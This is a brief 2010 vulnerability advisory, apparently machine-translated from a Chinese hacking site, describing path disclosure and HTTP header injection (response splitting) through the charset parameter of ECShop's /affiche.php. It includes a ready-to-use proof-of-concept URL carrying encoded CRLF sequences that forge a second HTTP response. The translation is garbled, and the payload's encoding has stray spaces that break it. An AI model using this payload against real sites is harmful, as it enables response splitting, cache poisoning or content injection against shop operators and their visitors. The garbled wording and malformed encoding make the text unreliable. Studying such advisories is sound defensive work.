ecshop the latest storm path oday-vulnerability warning-the black bar safety net

2010-09-14T00:00:00
ID MYHACK58:62201027860
Type myhack58
Reporter 佚名
Modified 2010-09-14T00:00:00

Description

Brief description: /affiche.php,php5 environmental error exposure program path, php4 environment to display the written information

Detailed description: the charset parameter is not to do rigorous filtration result in an http message header truncated written

Vulnerability to prove: http://www.myhack58.com/ecshop/affiche.php?act=js&type=3&from=xxx&ad_id=1&charset=GBK%0D%0A%0D%0AHTTP/1.1%2 0 2 0 0%20OK%0D%0A%0D%0AContent-Type:%20text/html%0D%0A%0D%0AContent-Length:%2 0 3 5%0D%0A%0D%0A%3Chtml%3Exxx%3C/html%3E%0D%0A%0D%0A